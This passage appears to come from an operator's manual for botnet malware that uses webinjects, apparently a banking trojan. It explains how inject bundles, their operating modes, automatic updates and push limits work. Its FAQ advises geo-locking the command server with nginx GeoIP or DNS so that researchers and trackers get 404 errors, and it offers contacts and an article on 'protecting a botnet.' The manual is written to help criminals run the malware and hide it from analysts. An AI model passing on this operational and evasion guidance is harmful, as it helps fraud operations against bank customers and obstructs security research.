If a bot receives several packs (bundles) with different modes of operation (dual, single, disabled), the "narrowest" mode of all the bundles is selected automatically, for example single.
To work, do chmod 777 on the folder files/webinjects.
The bot constantly checks for updates to any of the webinjects and, if there are any, updates them for itself.
Some aspects of the interface:
Download limit - if you need to push an inject XXXX times, regardless of country, BotID or other attributes.
Each pack (bundle) may include injects from any group.
 
********************************************************************************
========================== >>>>> 20. General recommendations and FAQ
********************************************************************************
To avoid problems with the scripts on the server, it is recommended to install a PHP version lower than 5.
If you want a guarantee against reverse engineers opening your files on the server, and 100% protection against any trackers and similar ills, we recommend binding your server to the country you are working on.
For example, all your files will be available over HTTP only to a user coming from Spain; everyone else, from other countries, will be given a 404.
This can be done with the GeoIP module for the nginx server, or by setting up the binding at the DNS level.
If you are interested, we can give you the contacts of good administrators who can help with this.
How to do it, and advice on protecting a botnet, can be read in the article in the "Knowledge Base" within the CRM.
Also, we want to draw attention to the fact that the bot build will NOT work with Proxifier!